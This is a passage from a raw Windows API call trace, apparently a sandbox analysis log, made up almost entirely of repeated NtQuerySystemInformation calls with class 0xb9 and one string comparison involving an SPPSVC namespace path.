ResultLength=0x0) [0270.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc270, Length=0x28, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0270.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc190, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc250, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0270.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.848] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 